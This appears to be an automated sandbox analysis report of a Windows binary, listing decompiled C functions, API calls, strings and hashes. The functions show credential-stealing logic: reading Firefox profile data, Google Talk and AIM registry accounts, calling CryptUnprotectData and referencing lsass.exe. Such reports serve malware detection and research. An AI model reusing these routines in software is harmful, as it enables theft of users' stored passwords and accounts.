                                • Opcode ID: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                • Instruction ID: b4f0ac16e309dff731b59d997bf236358cc0e702142a5422807362b934f22301
                                • Opcode Fuzzy Hash: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                • Instruction Fuzzy Hash: A22143717041046BCB19DFA8CC86FAAB7F8BF08705F14446EB44A97181EA78AE848B59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040FA34, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC6B
                                  • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC82
                                  • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCAD
                                  • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCD5
                                • memset.MSVCRT ref: 0040FA77
                                • strlen.MSVCRT ref: 0040FA8E
                                • strlen.MSVCRT ref: 0040FA97
                                • strlen.MSVCRT ref: 0040FAF0
                                • strlen.MSVCRT ref: 0040FAFE
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$_mbscatmemset$_mbscpy
                                • String ID: history.dat$places.sqlite
                                • API String ID: 29466866-467022611
                                • Opcode ID: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
                                • Instruction ID: 51ac12969def4fbc614ccf7375ed6982ef447687ff00d0a07234f36c10d15357
                                • Opcode Fuzzy Hash: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
                                • Instruction Fuzzy Hash: 7A313271D05118ABDB10EBA5DC85BDDBBB89F01319F1044BBE514F2181DB38AB89CB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004043E4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                Download Yara Rule
                                C-Code - Quality: 43%
                                			E004043E4() {
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				void _v283;
				char _v284;
				void _v556;
				void* __edi;
				void* __esi;
				void _t33;
				char* _t42;
				char _t48;
				intOrPtr _t50;
				intOrPtr _t51;

				_v284 = 0;
				memset( &_v283, 0, 0x104);
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t48 =  *0x41e568; // 0x43
				asm("stosb");
				if(_t48 == 0) {
					 *0x41e670 = GetSystemDirectoryA(0x41e568, 0x104);
				}
				0x413d0c( &_v284, 0x41e568);
				E0040680E( &_v284);
				if(E004028E7() == 0) {
					_v11 = 0;
					_v18 = 0x61;
					_v15 = 0x2e;
					_v14 = 0x65;
					_v16 = 0x73;
					_v12 = 0x65;
					_v20 = 0x6c;
					_v17 = 0x73;
					_v19 = 0x73;
					_v13 = 0x78;
				}
				_t17 =  &_v20; // 0x6c
				_t42 =  &_v284;
				E00406EFE(_t42, _t17);
				0x411147();
				 *0x41e010 = 0; // executed
				0x411560(_t42);
				_t50 =  *0x41e010; // 0x0
				if(_t50 == 0) {
					L7:
					return 0;
				}
				memcpy( &_v556, 0x41df00, 0x10c);
				_t51 =  *0x41e010; // 0x0
				if(_t51 == 0) {
					goto L7;
				}
				_t33 = _v556;
				if(_t33 == 0) {
					goto L7;
				}
				return _t33;
			}























                                0x00404400
                                0x00404406
                                0x0040440d
                                0x00404413
                                0x00404414
                                0x00404415
                                0x00404416
                                0x0040441b
                                0x00404421
                                0x00404427
                                0x00404431
                                0x00404431
                                0x0040443e
                                0x0040444b
                                0x00404457
                                0x00404459
                                0x0040445c
                                0x00404460
                                0x00404464
                                0x00404468
                                0x0040446c
                                0x00404470
                                0x00404474
                                0x00404478
                                0x0040447c
                                0x0040447c
                                0x00404480
                                0x00404484
                                0x0040448a
                                0x00404490
                                0x00404498
                                0x0040449e
                                0x004044a3
                                0x004044aa
                                0x004044d7
                                0x00000000
                                0x004044d7
                                0x004044bd
                                0x004044c5
                                0x004044cb
                                0x00000000
                                0x00000000
                                0x004044cd
                                0x004044d5
                                0x00000000
                                0x00000000
                                0x004044dd

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: DirectorySystem_mbscpymemcpymemset
                                • String ID: C:\Windows\system32$lsass.exe
                                • API String ID: 3651535325-911417967
                                • Opcode ID: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
                                • Instruction ID: 0e5f66d5a96f37e034b058b5e8cd5d15c838e509caf2427c45d960fa31638fa3
                                • Opcode Fuzzy Hash: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
                                • Instruction Fuzzy Hash: 23213671C04298B9EB10DBB9EC057CEBF789B04308F0484BAD644A7191C7B98B88C7A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040FC4F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040FC6B
                                • memset.MSVCRT ref: 0040FC82
                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                  • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                  • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                • _mbscat.MSVCRT ref: 0040FCAD
                                  • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                  • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                  • Part of subcall function 0041223F: _mbscpy.MSVCRT ref: 0041230C
                                • _mbscat.MSVCRT ref: 0040FCD5
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscatmemset$CloseFolderPathSpecial_mbscpystrlen
                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                • API String ID: 748118687-1174173950
                                • Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                • Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
                                • Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                • Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041212C, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • RegCloseKey.KERNELBASE(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
                                • _mbscat.MSVCRT ref: 00412188
                                  • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                Strings
                                • SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137
                                • :\Program Files, xrefs: 0041217E
                                • ProgramFilesDir, xrefs: 00412150
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseDirectoryOpenQueryValueWindows_mbscat
                                • String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                • API String ID: 3464146404-1099425022
                                • Opcode ID: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                • Instruction ID: 662ef04aa31600ef20de70b7cf87d02e8b1ceff17a77a69e12e4cdaece8db846
                                • Opcode Fuzzy Hash: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                • Instruction Fuzzy Hash: 2DF0E972508300BFE7119754AD07BCA7FE88F04314F20005BF644A0181FAE96EC0C29D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414DF0, Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(00414DE7), ref: 00414DF0
                                • GetModuleHandleA.KERNEL32(?,00414DE7), ref: 00414E42
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00414E6A
                                  • Part of subcall function 00414E0D: GetProcAddress.KERNEL32(00000000,00414DFE), ref: 00414E0E
                                  • Part of subcall function 00414E0D: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
                                  • Part of subcall function 00414E0D: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressHandleModuleProcProtectVirtual
                                • String ID:
                                • API String ID: 2099061454-0
                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                • Instruction ID: 25f2d81c04f4c45cc56d7cc0e98a54f4dee55ba3048ec5225fe48b17b8cda6c2
                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                • Instruction Fuzzy Hash: 9101DB3058570179AB2166754C02AFBAF987AE3364F18074BB05497293CA5C89C683BD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004085B9, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                Download Yara Rule
                                C-Code - Quality: 66%
                                			E004085B9(void* __ecx, void* __eflags, int _a4) {
				char _v8;
				long _v4112;
				void* __esi;
				intOrPtr* _t42;
				intOrPtr* _t43;
				char* _t46;
				int _t52;
				void* _t54;
				void* _t73;
				intOrPtr _t75;
				int _t78;
				struct HINSTANCE__** _t79;
				void* _t81;

				0x414060();
				_t73 = __ecx;
				E0040733E(__ecx + 4);
				_t78 = _a4;
				if(_t78 == 0) {
					L3:
					E0040821A(_t85, _t73); // executed
					_t79 = _t73 + 0x78;
					E00404D18(_t79);
					_t42 =  *((intOrPtr*)(_t79 + 4));
					if(_t42 == 0) {
						_t43 = 0;
						__eflags = 0;
					} else {
						_t43 =  *_t42( &_v8, 0, 0, 1, 0xf0000000); // executed
					}
					if(_t43 == 0) {
						L14:
						return _t43;
					} else {
						_a4 = 0;
						if( *((intOrPtr*)(_t73 + 0x20)) <= 0) {
							L12:
							_t75 = _v8;
							E00404D18(_t79);
							_t43 =  *((intOrPtr*)(_t79 + 8));
							if(_t43 != 0) {
								_t43 =  *_t43(_t75, 0);
							}
							goto L14;
						} else {
							goto L8;
						}
						do {
							L8:
							_t46 = E00407455(_a4, _t73 + 4);
							_v4112 = 0;
							MultiByteToWideChar(0, 0, _t46, 0xffffffff,  &_v4112, 0x800);
							0x413df8( &_v4112);
							E00408490(_t73, _v8,  &_v4112); // executed
							_t52 = wcslen( &_v4112);
							if(_t52 > 0) {
								_t54 = _t52 + _t52;
								if( *((short*)(_t81 + _t54 - 0x100e)) != 0x2f) {
									 *((short*)(_t81 + _t54 - 0x100c)) = 0x2f;
									 *((short*)(_t81 + _t54 - 0x100a)) = 0;
									E00408490(_t73, _v8,  &_v4112);
								}
							}
							_a4 = _a4 + 1;
						} while (_a4 <  *((intOrPtr*)(_t73 + 0x20)));
						goto L12;
					}
				}
				_a4 = 0;
				if( *((intOrPtr*)(_t78 + 0x1c)) <= 0) {
					goto L3;
				} else {
					goto L2;
				}
				do {
					L2:
					E00407407(_t73 + 4, E00407455(_a4, _t78));
					_a4 = _a4 + 1;
					_t85 = _a4 -  *((intOrPtr*)(_t78 + 0x1c));
				} while (_a4 <  *((intOrPtr*)(_t78 + 0x1c)));
				goto L3;
			}
















                                0x004085c1
                                0x004085c9
                                0x004085ce
                                0x004085d3
                                0x004085da
                                0x00408602
                                0x00408603
                                0x00408608
                                0x0040860b
                                0x00408610
                                0x00408615
                                0x00408628
                                0x00408628
                                0x00408617
                                0x00408624
                                0x00408624
                                0x0040862c
                                0x004086e6
                                0x004086ea
                                0x00408632
                                0x00408635
                                0x00408638
                                0x004086d3
                                0x004086d3
                                0x004086d6
                                0x004086db
                                0x004086e0
                                0x004086e4
                                0x004086e4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0040863e
                                0x0040863e
                                0x00408644
                                0x0040865a
                                0x00408661
                                0x0040866e
                                0x0040867f
                                0x0040868b
                                0x00408693
                                0x00408695
                                0x004086a0
                                0x004086a2
                                0x004086ac
                                0x004086bf
                                0x004086bf
                                0x004086a0
                                0x004086c4
                                0x004086ca
                                0x00000000
                                0x0040863e
                                0x0040862c
                                0x004085df
                                0x004085e2
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x004085e4
                                0x004085e4
                                0x004085f2
                                0x004085f7
                                0x004085fd
                                0x004085fd
                                0x00000000

                                APIs
                                  • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
                                  • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000800), ref: 00408661
                                • _wcslwr.MSVCRT ref: 0040866E
                                • wcslen.MSVCRT ref: 0040868B
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@$ByteCharMultiWide_wcslwrwcslen
                                • String ID: /$/
                                • API String ID: 2365529402-2523464752
                                • Opcode ID: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                • Instruction ID: 2a8444091b22e9eb4757945b889b84cf8c338ceadb4b858a9340bcb8d8787785
                                • Opcode Fuzzy Hash: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                • Instruction Fuzzy Hash: 5131A271500109EBDB11EF95CD819EEB3A8BF04345F10857EF585B3280DB78AE858BA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407F7E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E00407F7E(signed int _a4) {
				void* _v12;
				int _v16;
				void* _v20;
				void _v279;
				char _v280;
				void _v4375;
				int _v4376;
				long _t26;
				char* _t29;
				int _t31;
				void* _t39;
				void* _t44;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t51;

				0x414060();
				E00407C79(_a4); // executed
				_t26 =  &_v12;
				0x411d68(0x80000001, "Software\Google\Google Talk\Accounts", _t26, _t44, _t39);
				_t49 = _t48 + 0xc;
				if(_t26 == 0) {
					_v16 = 0;
					_v280 = 0;
					memset( &_v279, 0, 0xff);
					_t50 = _t49 + 0xc;
					_t29 =  &_v280;
					0x411dee(_v12, 0, _t29);
					while(1) {
						_t51 = _t50 + 0xc;
						if(_t29 != 0) {
							break;
						}
						_t31 =  &_v280;
						0x411d68(_v12, _t31,  &_v20);
						_t50 = _t51 + 0xc;
						if(_t31 == 0) {
							_v4376 = _t31;
							memset( &_v4375, _t31, 0xfff);
							_t50 = _t50 + 0xc;
							0x411d82(_v20, 0x418304);
							E00407E33(_a4,  &_v280,  &_v4376);
							RegCloseKey(_v20);
						}
						_v16 = _v16 + 1;
						_t29 =  &_v280;
						0x411dee(_v12, _v16, _t29);
					}
					_t26 = RegCloseKey(_v12);
				}
				return _t26;
			}



















                                0x00407f86
                                0x00407f90
                                0x00407f95
                                0x00407fa3
                                0x00407fa8
                                0x00407fad
                                0x00407fc2
                                0x00407fc5
                                0x00407fcc
                                0x00407fd1
                                0x00407fd4
                                0x00407fdf
                                0x00408067
                                0x00408067
                                0x0040806c
                                0x00000000
                                0x00000000
                                0x00407ff0
                                0x00407ffa
                                0x00407fff
                                0x00408004
                                0x0040800c
                                0x00408019
                                0x0040801e
                                0x00408034
                                0x00408048
                                0x00408050
                                0x00408050
                                0x00408052
                                0x00408055
                                0x00408062
                                0x00408062
                                0x00408075
                                0x00408075
                                0x0040807a

                                APIs
                                  • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CDB
                                  • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CEF
                                  • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D09
                                  • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D1E
                                  • Part of subcall function 00407C79: GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                  • Part of subcall function 00407C79: GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                  • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                  • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                  • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407D91
                                  • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407DA0
                                  • Part of subcall function 00407C79: memcpy.MSVCRT ref: 00407DB2
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • memset.MSVCRT ref: 00407FCC
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • memset.MSVCRT ref: 00408019
                                • RegCloseKey.ADVAPI32(000000FF,?,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 00408050
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,000000FF), ref: 00408075
                                Strings
                                • Software\Google\Google Talk\Accounts, xrefs: 00407F99
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                • String ID: Software\Google\Google Talk\Accounts
                                • API String ID: 2959138223-1079885057
                                • Opcode ID: 49074e8cae0c663ec28b6a12e2b781a56f038b486158cb3c34e9b0dfdaa3d0c9
                                • Instruction ID: d1f993f4292481421df56ff24d775a8bf39926e587c7cc16b4fa812e835a0406
                                • Opcode Fuzzy Hash: 49074e8cae0c663ec28b6a12e2b781a56f038b486158cb3c34e9b0dfdaa3d0c9
                                • Instruction Fuzzy Hash: CC2131B1D0511DBADF21AB95DD42EEEBB7CAF04744F0000B6FA08B1151E7355B94CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041223F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412192: LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
                                  • Part of subcall function 00412192: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                • memset.MSVCRT ref: 00412297
                                • RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                • _mbscpy.MSVCRT ref: 0041230C
                                  • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122B2, 004122C2
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersion_mbscpymemset
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                • API String ID: 3929982141-2036018995
                                • Opcode ID: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
                                • Instruction ID: 8ee396e5f1da91aaa9319efae8cdfa2544b6f7efa6ef91eb3d4b19fa56f42788
                                • Opcode Fuzzy Hash: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
                                • Instruction Fuzzy Hash: 7011DB71800215BBDB24A6985D4A9EE77BCDB05304F1000EBED51F2152D6B89EE4C69E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C427, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60windowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E0040C427(void* __eax, intOrPtr* __ebx) {
				void* __edi;
				void* __esi;
				intOrPtr* _t19;
				void* _t20;
				void* _t21;
				struct HICON__* _t23;
				intOrPtr* _t30;
				void* _t32;
				intOrPtr* _t35;

				_t30 = __ebx;
				 *((intOrPtr*)(__ebx + 0x140)) = 0;
				 *__ebx = 0x418778;
				 *((intOrPtr*)(__ebx + 0x388)) = 0;
				 *((intOrPtr*)(__ebx + 0x394)) = 0;
				0x413d5c(0x738);
				if(__eax == 0) {
					_t19 = 0;
					__eflags = 0;
				} else {
					_t19 = E0040D339(__eax);
					 *0x41e15c = _t19;
				}
				 *((intOrPtr*)(_t30 + 0x38c)) = _t19;
				0x413d5c(); // executed
				_t35 = _t19;
				_t40 = _t35;
				_t32 = 0x8fc;
				if(_t35 == 0) {
					_t35 = 0;
					__eflags = 0;
				} else {
					E004092CC(_t35, _t40);
					_t5 = _t35 + 0x1cc; // 0x1cc
					_t6 = _t5 + 8; // 0x1d4
					 *_t35 = 0x417eb8;
					E0040D339(_t6);
					 *_t5 = 0x417f40;
					 *(_t35 + 0x1c8) =  *(_t35 + 0x1c8) | 0xffffffff;
				}
				 *((intOrPtr*)(_t30 + 0x390)) = _t35;
				_t20 =  *(_t30 + 0x388);
				if(_t20 != 0) {
					DeleteObject(_t20);
					 *(_t30 + 0x388) = 0;
				}
				_t21 = E00406AE0(); // executed
				 *(_t30 + 0x388) = _t21;
				E00401000(_t32, _t30 + 0x285, 0x418678);
				 *((intOrPtr*)(_t30 + 0x174)) = 0;
				 *((intOrPtr*)(_t30 + 0x17c)) = 0;
				 *((intOrPtr*)(_t30 + 0x178)) = 0;
				 *((intOrPtr*)(_t30 + 0x170)) = 0;
				_t23 = LoadIconA( *0x41dbd4, 0x65); // executed
				E00402C8F(_t30, _t23);
				return _t30;
			}












                                0x0040c427
                                0x0040c42c
                                0x0040c432
                                0x0040c438
                                0x0040c443
                                0x0040c449
                                0x0040c451
                                0x0040c45f
                                0x0040c45f
                                0x0040c453
                                0x0040c453
                                0x0040c458
                                0x0040c458
                                0x0040c466
                                0x0040c46c
                                0x0040c471
                                0x0040c473
                                0x0040c475
                                0x0040c476
                                0x0040c4a0
                                0x0040c4a0
                                0x0040c478
                                0x0040c478
                                0x0040c47d
                                0x0040c483
                                0x0040c486
                                0x0040c48c
                                0x0040c491
                                0x0040c497
                                0x0040c497
                                0x0040c4a2
                                0x0040c4a8
                                0x0040c4b0
                                0x0040c4b3
                                0x0040c4b9
                                0x0040c4b9
                                0x0040c4bf
                                0x0040c4cf
                                0x0040c4d5
                                0x0040c4e2
                                0x0040c4e8
                                0x0040c4ee
                                0x0040c4f4
                                0x0040c4fa
                                0x0040c503
                                0x0040c50d

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@$DeleteIconLoadObject
                                • String ID: ;@
                                • API String ID: 1986663749-2925476404
                                • Opcode ID: 4dd53dc8d509f152d3d3e7defd5ee1d3aa3759e23b2fb38ffde6a536d33112bb
                                • Instruction ID: 4d16bad446557b49ffcede9a37569aa771c04751a2fd478bf3dc9e82e5d405e4
                                • Opcode Fuzzy Hash: 4dd53dc8d509f152d3d3e7defd5ee1d3aa3759e23b2fb38ffde6a536d33112bb
                                • Instruction Fuzzy Hash: A921AE70900314CBCB50AF6698846D97BA8BB01714F9886BFEC0DAF286CF7855408F68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414DB1, Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(?,00414DE7), ref: 00414E42
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00414E6A
                                  • Part of subcall function 00414DF0: GetModuleHandleA.KERNEL32(00414DE7), ref: 00414DF0
                                  • Part of subcall function 00414DF0: GetProcAddress.KERNEL32(00000000,00414DFE), ref: 00414E0E
                                  • Part of subcall function 00414DF0: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
                                  • Part of subcall function 00414DF0: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressHandleModuleProcProtectVirtual
                                • String ID:
                                • API String ID: 2099061454-0
                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                • Instruction ID: 043642bf5cdc1de150e3446c738409664b5144c0223cf5edf213a9aa475217cd
                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                • Instruction Fuzzy Hash: 8621E7311493416FEB218B745C017E6BBD8ABA7374F19469BD044CB283D26D98C693AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414E0D, Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNEL32(00000000,00414DFE), ref: 00414E0E
                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34
                                • GetModuleHandleA.KERNEL32(?,00414DE7), ref: 00414E42
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00414E6A
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProcProtectVirtual$HandleModule
                                • String ID:
                                • API String ID: 2152742572-0
                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                • Instruction ID: 94a9458822a42be4aa48e0704f6d9666272a38e661a699dcd97394ecc6966311
                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                • Instruction Fuzzy Hash: 72F022602857003CEF3155B41C42AFB9F8CAAE7360F280A4BF014C7283C59C888683BE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404C9D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00404C9D(struct HINSTANCE__** __eax, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__** _t11;

				_t11 = __eax;
				E00404CE0(__eax);
				_t7 = LoadLibraryA("crypt32.dll"); // executed
				 *_t11 = _t7;
				if(_t7 != 0) {
					_t10 = GetProcAddress(_t7, "CryptUnprotectData");
					_t11[2] = _t10;
					if(_t10 != 0) {
						_t11[1] = 1;
					}
				}
				if(_t11[1] == 0) {
					E00404CE0(_t11);
				}
				return _t11[1];
			}







                                0x00404c9e
                                0x00404ca0
                                0x00404caa
                                0x00404cb2
                                0x00404cb4
                                0x00404cbc
                                0x00404cc4
